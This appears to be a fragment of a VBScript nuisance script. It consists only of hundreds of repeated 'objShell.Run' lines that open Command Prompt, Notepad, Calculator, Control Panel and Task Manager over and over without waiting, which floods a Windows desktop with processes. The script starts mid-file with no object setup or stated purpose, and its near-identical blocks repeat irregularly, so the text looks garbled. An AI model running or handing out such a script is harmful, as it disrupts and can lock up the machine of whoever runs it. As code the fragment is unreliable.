objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False


objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False
objShell.Run "cmd.exe", 1, False
objShell.Run "notepad.exe", 1, False

objShell.Run "calc.exe", 1, False

objShell.Run "control.exe", 1, False
objShell.Run "taskmgr.exe", 1, False
objShell.Run "calc.exe", 1, False
